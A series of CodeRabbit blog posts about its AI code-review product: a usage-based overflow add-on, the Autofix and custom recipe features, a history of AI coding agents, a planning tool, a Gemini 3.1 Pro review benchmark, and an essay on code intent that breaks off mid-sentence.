Think about your last big sprint. You're pushing through a high-velocity release. The whole org is shipping in parallel. Large PRs are stacking up. CodeRabbit has been reviewing everything, keeping pace as always. Then it stops as you've hit your plan's review limit. You start asking: Now what? Do we wait for the reset? Should half the team pause? Are we merging without review? Now you have more options to tackle that. ## Meet the PR Usage-based Add-on The PR Usage-based Add-on lets your team keep reviewing PRs even after hitting a subscription limit - without upgrading your plan, manual intervention or per-reviewer setup. Once enabled through CodeRabbit dashboard, the rabbit automatically continues processing PR reviews beyond the limit, billing only the over-limit usage as pay-per-use. Credits kick in after the limit is reached, not before. Your regular usage stays on your plan. Only the overflow gets charged. ## How it actually works The mental model is simple. Your subscription covers your baseline. If your team has a burst like a large rollout, a complex refactoring sprint, an unusually active week, the add-on acts as a pressure valve. %[https://youtu.be/-2kRP1qp61I] Here's what happens: - Within your plan limit: Everything works exactly as it always has. No changes, no credits touched. - Over your plan limit, add-on enabled, credits available: CodeRabbit continues reviewing, charges pay-per-use for each over-limit review and keeps going. Developers see no interruption. - Over your plan limit, add-on disabled: Developers get a clear message that the rate limit has been reached and that an admin can enable credit-based usage to continue. - Over your plan limit, add-on enabled but credits insufficient: developers get a clear message to contact the admin to purchase more credits. - No silent failures or reviews quietly dropping. ## Who controls it Admins manage the add-on from the CodeRabbit dashboard via an org-level pay-per-use toggle. Reviewers don't need a separate billing configuration. They don't need to do anything differently per PR. Once an admin enables the add-on, the system handles the rest. Speaking of which: if your team uses the CodeRabbit CLI to trigger reviews, the same rules apply. CLI-originated reviews follow the same billing path and the same opt-in logic as reviews from GitHub, GitLab or Bitbucket PR pages. You don't manage two different systems. There's one toggle, credit balance and billing path. ## Why not just upgrade the plan? You could. But not every team that occasionally bursts past their limit actually needs a higher tier month after month. ![Usage-based add-on features: real-time API monitoring, full control, flexible options, and a 'Try it now' button.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_04_09_at_7_01_51_AM_e1aac83db6.png) Things like big sprints, org-wide rollout happens, genuinely gnarly PRs are rather irregular events. Paying for a permanently higher plan to handle occasional spikes isn't the right trade-off for every team. The add-on is designed for exactly that. You pay for what you use, when you use it. ## Getting started The PR Usage-based Add-on is available now. Head to your CodeRabbit dashboard, turn on pay-per-use in org settings, and make sure you have credits loaded. [Get started with CodeRabbit](https://coderabbit.link/C3yHp2s)

You don’t need to implement that. Autofix will.

Konrad Sopala — Thu, 02 Apr 2026 00:00:00 GMT

You open a pull request. CodeRabbit reviews it and leaves a handful of comments. So now you do what every developer does: * Read each comment * Context-switch back into the code, * Make the fix * Push a new commit And wait for CI to run again. Multiply that by a dozen PRs a week and it adds up fast. Why do it actually? The review already told you exactly what to change. ## Meet Autofix When CodeRabbit leaves review comments with clear fix instructions, [Autofix](https://docs.coderabbit.ai/finishing-touches/autofix) can implement them for you. ### The old way Until now, the way forward was copy-pasting our Prompt for AI Agents block into your tool of choice. ![GitHub code review screen shows 10 actionable AI-generated comments on code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/prompt_for_ai_agents_d3579272ad.png) ### The new way Now you trigger Autofix and it applies all unresolved findings in one go. %[https://youtu.be/tCbpNbdHdbo] You get two options for how the fixes land: * **Commit to your current branch**: fixes get pushed directly to the PR you’re already working on * **Open a stacked PR**: if you want to review the fixes independently before they touch your branch (a new PR is created from your feature branch) **Either way, nothing merges automatically**. You review the changes like any other code and decide what ships. ## How it works ### Comment in the PR To apply fixes directly to your branch ```plaintext @coderabbitai autofix ``` To open a separate PR with the fixes ```plaintext @coderabbitai autofix stacked pr ``` Both also accept auto-fix and auto fix if you forget the exact spelling, because nobody should have to remember whether it’s one word or two. ### Checkbox in the PR walkthrough In GitHub flows, CodeRabbit renders an **Autofix** section directly inside the review comment with interactive checkboxes. Check the box, and it runs - no command needed. ![GitHub interface showing coderabbitai bot's actionable comments and options for AI review, autofix.](https://victorious-bubble-f69a016683.media.strapiapp.com/autofix_checkbox_e09f5e02ea.png) ## What happens when you trigger Autofix When Autofix runs, here’s what’s happening under the hood: * **Scans unresolved threads**: CodeRabbit looks at all the review comments it created on the PR and identifies the ones that are still unresolved. * **Gathers fix instructions**: each CodeRabbit review comment includes a structured “Prompt for AI Agents” block with specific instructions, which Autofix collects * **Applies the change**: a coding agent implements the fixes with full repository context. * **Runs verification**: it executes a repository setup and build verification step to check that the fixes don’t break anything. * **Delivers the result**: even if verification fails, Autofix still delivers the generated changes so you can continue iterating. You’re never left empty-handed. The whole point is to preserve your review workflow, not replace it. Autofix generates the diff and you decide whether it’s correct. ## Even though it’s auto you can still control it if you want Autofix processes all unresolved CodeRabbit review comments. If there’s a specific comment you *don’t* want it to touch - maybe you disagree with the suggestion, or you want to handle it differently - just resolve that comment manually before running Autofix. Hit the “Resolve conversation” button on GitHub, then trigger the command. Autofix will skip it. This keeps you in control. Autofix is aggressive about applying what’s open, but it respects what you’ve explicitly closed. ## Try it out Autofix is available on GitHub and GitLab as an open beta for CodeRabbit Pro Plan users. If you’re tired of implementing review feedback that’s already been spelled out for you, give it a try. Comment on your next PR and see what comes back. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

Why do that stuff manually when you have Custom Finishing Touch recipes?

Konrad Sopala — Thu, 26 Mar 2026 00:00:00 GMT

Go check your pull requests real quick. If you’re like most devs, there’s at least one PR in there that’s almost done. The feature works, the logic makes sense, tests pass locally. If someone asked whether it was finished, you’d probably say, “Yeah... pretty much.” And yet it’s still open. ![](https://cdn.hashnode.com/uploads/covers/695d7ae2e2a2e9cdf5199232/80ce4a55-e521-451c-8e92-b7c6029b9fde.png align="center") Picture above courtesy of [https://dev.to/linearb/dev-interrupteds-best-programmer-humor-36ck](https://dev.to/linearb/dev-interrupteds-best-programmer-humor-36ck) Why? Because every team has the same recurring review comments. Enforce import ordering. Tighten TypeScript types. Apply project-specific conventions. Add missing docstrings. The list goes on. These tasks are important, but they’re also repetitive and they’re the reason PRs sit open longer than they need to. What if you could generate what’s missing and open a reviewable change, all from within the PR itself? ## What are Finishing Touches? Let’s do a short terminology intro before we dive into the core. [Finishing Touches](https://docs.coderabbit.ai/finishing-touches) is a set of features that includes [Custom Finishing Touch recipes](https://docs.coderabbit.ai/finishing-touches/custom-finishing-touches). At a high-level those are one-click agentic actions that polish and extend your PRs handling the following: * Resolving [merge conflicts](https://docs.coderabbit.ai/finishing-touches/resolve-merge-conflict) * Generating [unit tests](https://docs.coderabbit.ai/finishing-touches/unit-test-generation) * [Automatically implementing fixes](https://docs.coderabbit.ai/finishing-touches/autofix) for review findings * [Simplifying code](https://docs.coderabbit.ai/finishing-touches/simplify) * Generating [docstrings](https://docs.coderabbit.ai/finishing-touches/docstrings) And finally, [running custom agentic code](https://docs.coderabbit.ai/finishing-touches/custom-finishing-touches) on your PRs, which this blog is all about. ## Introducing: Custom Finishing Touch recipes Every team has its own recurring cleanup patterns - things that standard linters don’t catch and that come up in review after review. Custom Finishing Touch recipes let you define reusable, named instructions that run agentic code changes against your pull requests. They’re perfect if you: * See the same hygiene comments across PRs. * Enforce project-specific conventions beyond standard linters. * Want fewer back-and-forth review cycles. * Don’t want to slow down your developers ### How it works You can set it up in two different ways: * [Through CodeRabbit YAML File](https://docs.coderabbit.ai/getting-started/yaml-configuration) You define recipes inside `.coderabbit.yaml` like this: ```plaintext reviews: finishing_touches: custom: - name: "cleanup stale imports" instructions: | Scan the changed files for unused imports and remove them. Preserve imports used in type positions. Do not reorder existing imports; only remove stale ones. ``` Then you trigger it directly in a pull request: ```plaintext @coderabbitai run cleanup stale imports ``` CodeRabbit runs the recipe and opens a new pull request with the result. You review it like any other PR. Want to experiment before committing a recipe to your config? Run an ad hoc evaluation: ```plaintext @coderabbitai evaluate custom finishing touch --name "sort imports" --instructions "Sort all import statements alphabetically within each import group in the changed files." ``` Same execution model, nothing persisted, which is useful for one-off tasks and testing ideas before you formalize them. * [Through CodeRabbit Web Interface](https://app.coderabbit.ai/organization/settings/review/finishing-touches) Click on Organization Settings in the left sidebar and head to Finishing touches. From there you’ll be able to add your custom recipes. ![](https://cdn.hashnode.com/uploads/covers/695d7ae2e2a2e9cdf5199232/2fd1d7ae-0adc-40b3-b34f-6c372921756e.png align="center") ### Core tips You can define up to five recipes per repository. Recipe names are case-insensitive and you can disable a recipe without deleting it. ## What actually happens behind the scenes When you trigger a recipe, CodeRabbit does more than a simple script. It clones your repository into an isolated sandbox and provides the agent with full PR context, including the title, description, summary and objectives. It also pulls in your global coding guidelines from *reviews.path\_instructions*, so the agent follows the same conventions your team already agreed on. From there, it has controlled repository access through Read, Write, Edit, Glob, Grep, and Bash tools. It executes your instructions and opens a new pull request against your branch with the proposed changes. %[https://youtu.be/_0jBjDqIF1U?si=_875EzFGOfWQzbU3] Nothing merges automatically or silently modifies your branch. You review the diff like any other PR and decide what ships. ## Try it out Custom Finishing Touch recipes are available on GitHub in early access for Pro plan users, with GitLab and Bitbucket support coming soon. If your team keeps leaving the same cleanup comments in pull requests, give it a try. Pointing out what's missing is only half the job. If the cleanup is still manual, the bottleneck is still there. We want to get rid of it. [Get started with CodeRabbit.](https://app.coderabbit.ai/login???free-trial)

A very brief history of AI coding, from Copilot to next-gen agents

David Kravets — Wed, 18 Mar 2026 00:00:00 GMT

The history of AI coding agents begins before anyone seriously called them agents. In 2017, *Attention Is All You Need* paper introduced the [Transformer](https://arxiv.org/abs/1706.03762), the architecture that made modern large language models possible. In 2020, [CodeBERT](https://arxiv.org/abs/2002.08155) brought that foundation closer to software development by showing that natural language and programming language could be learned together in a single pretrained system for tasks like code search and documentation generation. These were not agents in the modern sense. They did not open files, run tests, or act inside a development environment. But they established the premise that made everything else possible. Code could be modeled as language, and language models could learn useful representations of how software is written, explained, and transformed. By 2021, that line of research had matured into practical, testable code generation. [Codex 2021](https://arxiv.org/abs/2107.03374) described a GPT model fine-tuned on publicly available code and evaluated with [HumanEval](https://arxiv.org/abs/2107.03374). GitHub announced [Copilot](https://github.blog/news-insights/product-news/introducing-github-copilot-ai-pair-programmer/) on June 29, 2021 and the Codex paper followed on July 7, explicitly noting that a distinct production version of Codex powered Copilot. That detail matters because it marked the bridge LLMs crossed from research artifact to mainstream developer product. ## **Copilot made AI coding feel native** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/187dd8de0fbf5bff977add8a76306735eeaf9dc807a1c83250036707c003072e_e519682e9d.jpg) When Copilot arrived, it did something historically more important than “write code.” It made AI feel native to the act of programming. GitHub described Copilot as an AI pair programmer that could draw context from the code around it and suggest whole lines or even entire functions inside the editor. That sounds ordinary now, but in 2021 it was a genuine interface breakthrough. Code generation stopped living in research demos and started living on the editing surface itself, where latency, relevance, and developer trust mattered more than abstract benchmark scores. That is why Copilot accomplished more than a traditional autocomplete tool. Its significance was not just model quality. It was the product decision to put the model directly into the workflow of writing software. GitHub’s later [research](https://github.blog/news-insights/research/research-quantifying-github-copilots-impact-on-developer-productivity-and-happiness/) found that Copilot users completed tasks faster and reported conserving mental effort. In other words, Copilot did not merely show that a model could emit code. It showed that AI assistance could change the process of software development. ## **After autocomplete came intent** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c21ce7e5b11e2859068272d6c3d72ccdbfab9aa054ae5bd1e6339041ebd185dc_4a20966512.jpg) The next important signal came in 2022 and it did not come from an editor. DeepMind’s [AlphaCode](https://deepmind.google/blog/competitive-programming-with-alphacode/) showed that harder programming problems often require something beyond elegant one-shot generation. AlphaCode generated many candidate programs, filtered them aggressively, and leaned on program behavior rather than surface fluency alone. In competitive programming, it reached roughly the level of the median competitor. Historically, AlphaCode mattered because it previewed a principle that later coding agents would rely on constantly. Difficult software tasks are often search problems, not just language problems. Later that same year, [ChatGPT](https://openai.com/index/chatgpt/) made conversational interaction with a model mainstream, and [InstructGPT](https://arxiv.org/abs/2203.02155) had already shown why that mattered. Models tuned to follow user intent are more useful than models that merely continue text. In March 2023, [GitHub Copilot X](https://github.blog/news-insights/product-news/github-copilot-x-the-ai-powered-developer-experience/) brought that shift directly into software development with chat, pull request assistance, documentation help, and GPT-4 integration. From that point on, the relationship between developer and machine changed. You no longer had to wait for the right completion to appear. You could explain what you wanted, ask for a refactor, request tests, or ask the system to explain unfamiliar code. ## **Conversation wasn’t enough, the assistant had to see the repo** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e3d1818eab1855e3ceee66c0c1730720e943a0ec4f1e65711dff8f97eee9a3d8_29f6afd04f.png) As soon as coding AI became conversational, a new bottleneck appeared: context. Chat is only as good as what it can retrieve about the project in front of it. GitHub’s [repository indexing](https://docs.github.com/copilot/concepts/indexing-repositories-for-copilot-chat) docs make the shift explicit. Indexing runs in the background, and once an index exists, Copilot Chat can answer questions about the repository in GitHub and in VS Code. This was the moment coding AI stopped acting like a brilliant stranger and started acting more like a coworker who had at least read the codebase. At the same time, open code models started adapting more directly to how programmers actually edit. [SantaCoder](https://huggingface.co/bigcode/santacoder) emphasized fill-in-the-middle generation. [StarCoder](https://huggingface.co/blog/starcoder) pushed the open-model frontier with broader language coverage and longer context. [Code Llama](https://arxiv.org/abs/2308.12950) emphasized infilling and larger input windows. Those details mattered because real developers rarely write left to right from a blank page. They insert, patch, refactor, stub, and repair inside existing systems. The training objective was beginning to match the mechanics of software work. ## **An agent is a model that can act** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8ac3f6d55e6421c46e40c5877d19c694c50858692a736c52112933469c0f1fbf_2c5343056c.png) This is where the modern meaning of “agent” starts to crystallize. A coding model becomes a coding agent when it can do more than generate plausible code. It has to inspect files, call tools, run commands, observe failures, and continue. The [ReAct](https://arxiv.org/abs/2210.03629) paper gave the field a crisp conceptual template for interleaving reasoning and action, while [OpenAI’s function calling](https://openai.com/index/function-calling-and-other-api-updates/) made tool use practical as a product and API pattern. Together, they shifted the field from passive generation toward closed-loop interaction with an environment. That idea quickly became concrete. The authors of the [SWE-agent](https://arxiv.org/abs/2405.15793) paper argued that language-model agents needed their own “agent-computer interface” for navigating repositories, editing files, and executing programs. [Devin](https://cognition.ai/blog/introducing-devin) packaged a shell, editor, and browser inside a sandboxed compute environment. [OpenHands](https://docs.openhands.dev/overview/introduction) turned the same thesis into a more open and composable stack that can run locally, in the terminal, or in CI/CD workflows. In each case, the breakthrough was not just better code generation. It was the ability to take an action, inspect the result, and try again. ## **Benchmarks stopped asking for functions and started asking for work** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/40fc8c8924113e3bc4350d4b118d669f708fda9b1b395c7d43d8ba58686624a5_1a2475cec3.png) The benchmarks tell the history in miniature. In 2021, HumanEval measured whether a model could synthesize a correct function from a docstring. By 2023, the authors of the SWE-bench paper asked whether a system could resolve real GitHub issues in real repositories. That shift is enormous. The field stopped asking whether a model could produce code that looked competent and started asking whether a system could actually complete software tasks under real constraints. Then the bar rose again. [SWE-bench Verified](https://openai.com/index/introducing-swe-bench-verified/) introduced a human-validated subset for more reliable evaluation. [LiveCodeBench](https://arxiv.org/abs/2403.07974) focused on contamination-free evaluation and explicitly broadened the target to include self-repair, code execution, and test-output prediction. [Terminal-Bench](https://arxiv.org/abs/2601.11868) moved closer still to reality by measuring performance on hard, realistic command-line tasks. Evaluation stopped rewarding code that merely looked plausible and started rewarding systems that could finish real work. ## **The background agent era** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ccbc9431daa56a63090dd8b009420108cbd9f01be1b90689d153b2140ca3f65c_522902c1ba.jpg) By 2025, the category had changed shape again. As of early 2026, GitHub documents two complementary agent experiences. In [VS Code](https://code.visualstudio.com/docs/copilot/overview), you can describe what you want to build and let an agent plan, implement, and verify changes across the project. In GitHub itself, [Copilot coding agent](https://docs.github.com/copilot/concepts/agents/coding-agent/about-coding-agent) works in the background as part of the pull request workflow. You assign work, it makes changes, opens a pull request, and then asks for review. The assistant no longer had to wait at the cursor. The agent could take a task and come back with work product. Other platforms converged on the same pattern. Recycling the term Codex, the [OpenAI Codex](https://openai.com/index/introducing-codex/) product was reintroduced in 2025 as a software engineering agent for longer-running tasks, while Google’s [Jules](https://jules.google/docs/) is explicitly framed as an experimental coding agent that integrates with GitHub, works autonomously, and can open pull requests with runnable code and test results inside secure cloud VMs. The cloud sandbox became the natural habitat of the background coding agent. ## **The terminal and the editor became control planes** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a01865839decb90fc7d1f6d1bff9f680b27f549b0e83cc4caec1d44645320fc1_e80eed370d.jpg) The local interface evolved in parallel. [Claude Code](https://code.claude.com/docs/en/overview) is described by Anthropic as an agentic coding tool that reads your codebase, edits files, runs commands, and integrates with development tools. Its [GitHub Actions](https://code.claude.com/docs/en/github-actions) workflow can respond to @claude mentions in issues and pull requests, and Claude Code now supports specialized [subagents](https://code.claude.com/docs/en/sub-agents) for task-specific workflows. [Codex CLI](https://developers.openai.com/codex/cli/) brings OpenAI’s coding agent into the terminal, [GitHub Copilot CLI](https://docs.github.com/en/copilot/how-tos/copilot-cli/use-copilot-cli-agents/overview) is now framed as a terminal-native agent with higher-autonomy modes, and Google’s [Gemini CLI](https://developers.google.com/gemini-code-assist/docs/gemini-cli) powers [Gemini Code Assist agent mode](https://developers.google.com/gemini-code-assist/docs/agent-mode). The terminal stopped being just a shell. It became an operating system for agents. AI-native editors pushed the same logic further. [Cursor](https://cursor.com/docs) describes itself as an AI editor and coding agent. Cursor [Agent](https://cursor.com/docs/agent/overview) can complete complex tasks, run terminal commands, and edit code, while [Cloud Agents](https://cursor.com/docs/cloud-agent) run remotely and [Automations](https://cursor.com/blog/automations) can trigger agent work on schedules or events. [Windsurf’s Cascade](https://docs.windsurf.com/windsurf/cascade/cascade) combines planning, code edits, memories, workflows. The editor was no longer simply where humans wrote code. It became a coordination layer where humans supervise, redirect, and collaborate with agents. ## **Instructions and integrations became infrastructure** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ffeca1665666067b594c02d68169762c0cd47e9d5b667e40b54fbf56bfc39bcf_d8677f2c42.png) Once agents could act, organizations discovered a new problem. How do you make them act like *your* team? That is why instruction files and interoperability protocols became central. [Anthropic introduced](https://www.anthropic.com/news/model-context-protocol) MCP in late 2024 as an open standard for AI applications to connect to external tools and data sources. At the same time, repository instruction files like [AGENTS.md](http://AGENTS.md) gave coding agents a predictable place to find setup steps, testing commands, architectural guidance, and review expectations. OpenAI’s docs say [Codex reads](https://developers.openai.com/codex/guides/agents-md/) [AGENTS.md](http://AGENTS.md) [files before doing any work](https://developers.openai.com/codex/guides/agents-md/). Anthropic’s [CLAUDE.md](http://CLAUDE.md) [files and auto memory](https://code.claude.com/docs/en/memory) give Claude persistent project context. GitHub supports repository and organization [custom instructions](https://docs.github.com/en/copilot/how-tos/configure-custom-instructions), and Cursor exposes persistent [Rules](https://cursor.com/docs/rules). Prompt engineering had become something closer to infrastructure. This matters historically because it marks another conceptual shift. In the early Copilot era, the prompt was mostly ephemeral: a comment, a function name, a cursor position. In the agent era, the durable instructions matter just as much as the transient request. Teams now encode setup commands, testing rules, code style, escalation paths, and review standards in files that travel with the repository. That is a very different world from “predict the next line.” It is much closer to giving a new teammate an operating manual. ## **What the history actually shows** The cleanest way to describe this history is not as autocomplete getting smarter, but as the systematic decomposition of software engineering into machine-operable layers. First came code models. Then inline generation. Then conversation. Then codebase awareness. Then tool use. Then background execution. Then persistent memory. Then a layer of review and validation. Each breakthrough solved a bottleneck created by the one before it. We began by teaching machines to predict code. We are ending, for the moment, by reorganizing software engineering around machines that can take goals, navigate systems, and produce working changes. ***Interested in trying out AI code reviews? Get a*** [***free 14-day trial.***](https://coderabbit.link/7kZn4T5)

Meet CodeRabbit Plan: Better plans. Faster delivery. Less rework

Konrad Sopala — Wed, 18 Mar 2026 00:00:00 GMT

## The challenge Teams using coding agents need prompts that are clear, specific and context-aware. That's exactly why we built [CodeRabbit Plan](http://coderabbit.ai/issue-planner), a collaborative planning tool that turns vague ideas into agent-ready prompts, whether you're starting from a concept, a ticket, or just a text prompt. Bad prompts cost you – in time, compute and dev hours. Two problems collide here. First, poorly written prompts drag out your SDLC with things like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a210d2900b3ae248cc538d0075e54214265efe8ae400cfa12c7dbdb80f7481a7_1f3072e9d5.png) Second, crafting high-quality prompts is time-consuming. Teams need to align, clarify and preserve a few components like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/772c75150cd01e97c335e8fc16078f6d47af7ca0f8de0b43fea552d96c3b5f07_ee8ee143b2.png) ## The solution: CodeRabbit Plan CodeRabbit Issue Planner now becomes Plan. We’re decoupling planning and issue tracking so you can start planning from a concept or a prompt – not just from an existing ticket. [CodeRabbit Plan](http://coderabbit.ai/issue-planner) helps teams using coding agents plan collaboratively and align intent before anyone writes a line of code. It turns vague ideas into well-defined phased plans you can share, review and preserve. Each plan generates editable prompts packed with context from your codebase, tickets, team knowledge base and tools like Notion and Confluence – all powered by CodeRabbit’s context engine. Hand these high-quality prompts to the coding agent of your choice and your team can shorten dev cycles, cut code churn and technical debt, and ship better code. Plan creation now happens through a simple text box. Type a prompt, optionally attach an image and get a full plan back. Apart from that, you can still create plans from issue tracking tools like Linear and Jira. ## Core capabilities Whether you’re building features, fixing issues or prototyping an MVP, [CodeRabbit Plan](https://app.coderabbit.ai/planning/new) covers you with a few core capabilities: * Researching and creating phased plans and tasks * Generating prompts with context from codebases, knowledge bases, tickets and more * Chat to revision interface * Agent prompts handoff ## Get started CodeRabbit Plan is available today. Just go to the [CodeRabbit website](https://app.coderabbit.ai/planning/new) and give it a try!

Gemini 3.1 Pro for code-related tasks: More focus, higher signal-to-noise

Erfan Al-Hossami — Thu, 12 Mar 2026 00:00:00 GMT

In practice, developers experience AI code review through the comments it leaves on pull requests: how often it finds real issues, how much noise it produces, and how actionable its feedback is. To answer those questions, we ran a benchmark comparing **Google’s Gemini 3.1 Pro** against our internal review baseline, a proprietary blend of OpenAI and Anthropic models tuned for CodeRabbit’s agentic PR review workflow. Using real pull requests with injected bugs, we measured not just detection rates but the structure and quality of the review comments themselves. The result reveals a clear trade-off: **Gemini leaves fewer, more focused comments with a higher signal-to-noise ratio, but it also surfaces fewer bugs overall.** ## **Methodology: How we benchmarked Gemini 3.1 Pro** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/47dab2c9037806acd9e7de863ef58bb0cd4ddd4f84ab8fea3a8f609640befa8c_79a9dfd9a1.png) Our benchmark uses an internal dataset composed of real GitHub pull requests into which specific, known error patterns must be addressed. Each error pattern (EP) has a ground-truth description of an issue. A model "passes" an EP if at least one of its review comments directly addresses or surfaces the root cause of the injected bug, either by proposing a concrete fix or by explicitly identifying the risk with an actionable direction. We used a suite of 25 hard PRs, each seeded with a known error pattern (EP). Our scoring focuses on: * Actionable comments only: Comments that get posted (not additional suggestions or outside-diff notes). * EP PASS (per comment): The comment directly fixes or surfaces the EP. * Important comments: Either EP PASS or another major/critical real bug. * Precision: EP PASS ÷ total comments. * SNR: Important ÷ (total − Important). We compared: * Gemini 3.1 Pro * CodeRabbit Production (a proprietary blend of OpenAI and Anthropic models tuned for CodeRabbit’s agentic PR review workflow) ## **Performance results** ### **Coverage and precision** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0fc5a2c5e231498c01b35b074c3a3871cc50ab6cd166e3c12356b9491ee8bd9f_e4db1f2fec.png) Gemini 3.1 Pro trails on coverage by 4.3 percentage points. It generates 24% fewer actionable comments while landing a slightly higher proportion of them on target (33.3% vs 29.8%). On raw coverage, Baseline has the edge. The baseline’s nitpick-level comments detect **2 additional EPs** (+8.7pp) beyond its main comments, meanwhile Gemini does not detect EPs in its nitpick comments. ### **Signal quality** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c3e0a9559804172a0ddfcb6236257bcf570520d3ac150b80e56ad659873d8737_aa8afcc434.png) Gemini has a higher important-comment rate (77.8% vs 71.9%) and a better SNR (3.5 vs 2.6). Its comments are more likely to be classified as serious issues. It generates proportionally fewer minor comments than our baseline. On signal quality per comment, Gemini is ahead. ## **The behavioral layer** Most benchmark posts stop at pass rate and precision. This one doesn't. We ran tone classification on every comment to measure how each model communicates and found a meaningful difference. ### **Tone Profile** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/86ba001794c337a738b0e116866a35923d772720c735bdab29ec27c476f65e0d_0ce4536576.png) Gemini hedges more (0.229 vs 0.175) but is simultaneously more assertive (0.756 vs 0.703) and more confident (0.947 vs 0.939). This isn't contradictory; it reflects a style where Gemini softens its framing ("you might want to consider…") while its technical conclusions remain decisive. Its comments are longer on average but less likely to include code blocks or diff patches compared to Baseline. ### **The sharpest behavioral finding: Gemini knows when it's right** When we split tone metrics by pass/fail outcome, a strong pattern emerges: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e3ad93260d8a9f78f040207ee48d594b72a332d75ff3450b0ba7e0aaeee30a44_f655d21cdc.png) **Gemini's passing comments are 38% more assertive and 33% longer than its failing ones.** When Gemini catches a bug, it's measurably more decisive, more detailed, and more code-inclusive. Its internal confidence signal is reliable: if Gemini is assertive and long, it's probably right. Baseline shows the same directional pattern but the gap is narrower; its passing and failing comments look more similar to each other. Baseline's code block rate is nearly identical whether the comment passes or fails (88.2% vs 87.5%). Baseline applies effort broadly; Gemini concentrates it. This has a practical implication for teams using these models: **Gemini's comment tone is a useful proxy for comment quality.** A terse, hedged Gemini comment warrants more skepticism than an assertive, code-heavy one. Baseline's comments are more uniformly formatted regardless of accuracy. ## **Where Gemini shines** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/57408f3a3f6671a2d3625dfb127e33c4640ee96cd75a9b688e4a95d547658745_e6aee3752f.png) **Comment density when on target**: On the EPs where both models pass, Gemini's passing comments tend to be more specific. Its average passing comment is 1174 characters, nearly 32% longer than a typical Baseline passing comment (891 chars), and concentrates more on the root cause rather than symptom. ## **Where Gemini falls short** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/45ec75037c5e21b748d5dd1972119a9a0251281a47ed226d592ec78c70efab06_aefc504551.png) **Concurrency and threading (56% vs 78% on 9 EPs)**: This is the critical gap. Nine error patterns covered concurrency bugs, lock misuse, timing dependencies, race conditions, livelock. Gemini detected 5; Baseline detected 7. The 22-point gap on the dominant category in this dataset is what drives the coverage difference. ## **Conclusion & Limitations** Gemini 3.1 Pro produces higher-quality, more focused comments with better signal-to-noise, but it covers fewer bugs overall. Its SNR of 3.5 vs 2.6 means a developer reading Gemini's review is less likely to waste time on a low-quality comment. But with 60.9% EP detection vs 65.2% for Baseline, you're leaving more real bugs undetected. For codebases where concurrency bugs are a material risk, that gap matters. One finding worth tracking across future evaluations: **Gemini's internal tone calibration is strong.** Its assertiveness score seems to provide a signal as to whether a comment is likely to address the underlying issue. That said, these findings are scoped. The benchmark covers 25 error patterns across five repositories spanning Python, TypeScript, C/C++, and a mixed-language GitHub Actions codebase, but the error distribution is weighted heavily toward concurrency bugs (9 of 25 EPs), which is both where Gemini struggles most and where the gap is widest. Results may look different on codebases where OOP, transaction-semantic, or other bugs dominate. The tone calibration finding in particular should be validated on a broader error distribution before being trusted as a source of greater likelihood the comment is right. * * * *Evaluation conducted February 24, 2026. Baseline: Internal baseline on 25 difficult PRs evaluated for Gemini 3.1 Pro. Tone classification by GPT-5.1. Pass/fail determined by independent LLM judge per comment against ground-truth error description.* ***Interested in trying CodeRabbit? Get a*** [***14-day free trial!***](https://coderabbit.link/0XvQhxZ)

The one thing devs will still read when they stop reading code

Priyanka Kukreja — Thu, 12 Mar 2026 00:00:00 GMT

Code was never meant to be read. We just had no alternative. Consider a real-world example: a production payments service with layered retry logic, idempotency keys, circuit breakers, feature flags, and compliance checks woven through middleware. The control flow may be technically clean and fully tested, but the intent is fragmented across conditionals, decorators, and utility abstractions. A single refund path might span five files and three layers of indirection. The machine sees a deterministic execution graph. A human sees scattered branches and implicit constraints - and has to reconstruct which failure modes were considered acceptable, which were business-critical, and which were accidental side effects. For years, we treated code as the highest form of truth in software. If you wanted to know what a system did, you read the code. If you wanted to verify what was built, you inspected the code. That assumption makes sense when humans are the primary authors. As agents take on more of the authorship - first in frontier teams, soon more broadly - that assumption begins to break. We are not *moving towards* a world where agents write software. Many of us are already living in it. Agents write the code, review the diffs and catch the bugs before a human ever sees them. At [CodeRabbit](https://www.coderabbit.ai/), we review millions of pull requests every month and we’ve seen the ratio of human-written to AI-written code inverting at companies on the frontier. When [we sampled 470 open-source GitHub pull requests](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) for our study earlier this year, we found that 320 were AI-co-authored PRs and 150 human-only PRs. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/56ed2474f3d79bc8e96163f5bc13072886a41ada8c7d204156bb646407861b2a_0fe5719882.png) This growing use of agentic AI will see more features materialize from prompts, instead of sitting in the backlog. Migrations that used to take weeks being done overnight. Refactoring that was deprioritized but can now actually be undertaken. And yet a glaring gap has opened up that acceleration alone cannot close. ## **The gap no one talks about** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/853905fb362444f27dfa19745be4756fba4a03183d692e6be59348be296ef7fb_b956af49d6.png) When agent-generated code first hits your codebase, it feels like magic. By the twentieth PR, the system starts to feel opaque. By the fiftieth PR, the team is maintaining an artifact that no one fully understands but everyone is expected to extend. Generated code works like sediment. Plausible at each layer, harder to reason about over time. "Just read the code" stops being serious advice. It becomes a ritual repeated because no better system of record exists. The problem isn't the code quality. The agents write clean, tested, locally-correct code. The problem is *intent*. Some ‘human’ questions that code never answered particularly well: * Why was this pattern chosen? * Which constraints mattered? * What did the agent explicitly decide not to do? * What counts as done? Agents now make this limitation of the code impossible to ignore. ## **Code is the new assembly** There's a useful parallel. In the 1950s, programmers wrote assembly. You had to understand registers, memory addresses, instruction cycles: the full machinery. Then abstraction layers arrived. Today, almost no working programmer writes assembly. It still runs underneath everything, but it's not the *human interface* anymore. Code 